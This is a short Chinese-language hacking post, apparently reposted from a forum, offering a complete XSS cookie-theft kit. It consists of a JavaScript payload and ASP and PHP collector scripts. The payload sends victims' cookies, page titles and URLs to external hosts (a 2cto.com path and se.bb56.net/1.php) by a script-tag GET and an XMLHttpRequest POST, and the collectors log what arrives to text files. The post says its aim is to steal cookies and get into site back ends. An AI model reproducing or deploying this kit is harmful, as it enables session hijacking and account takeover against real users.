大家知道xss攻击最有效的方式就是盗取cookie值。通过盗取cookie值可以进入后台从法客搬过来的~
JS:
document.write('<script LANGUAGE="Javascript" src="" id="get">');
function get(url)
{
var obj = document.getElementById("get");
obj.src = url;
}
var u="http:// www.2cto.com /1.php?msg="+escape(document.title)+"|"+document.cookie+"|"+escape(document.URL); get(u);
function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<10;i++) try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
return request;
}
function postmydata(action,data){
xmlhttp.open("POST", action, false);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(data);
return xmlhttp.responseText;
}
xmlhttp=poster();
//data="msg=document.cookie";
data="msg="+escape(document.title)+"|"+document.cookie+"|"+escape(document.URL);
postmydata("http://se.bb56.net/1.php",data);
服务器端代码:
asp:
<%
testfile=Server.MapPath("1.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&now()&"|"&msg& "")
thisfile.close
set fs = nothing
%>
php:
<?php
$content=$_REQUEST["msg"];
$time=date('Y-m-d H:i:s',time());
$file="xss.txt";
$fp = fopen($file,"a+");
fwrite($fp,$time."|".$content."\r\n");
fclose($fp);
?>
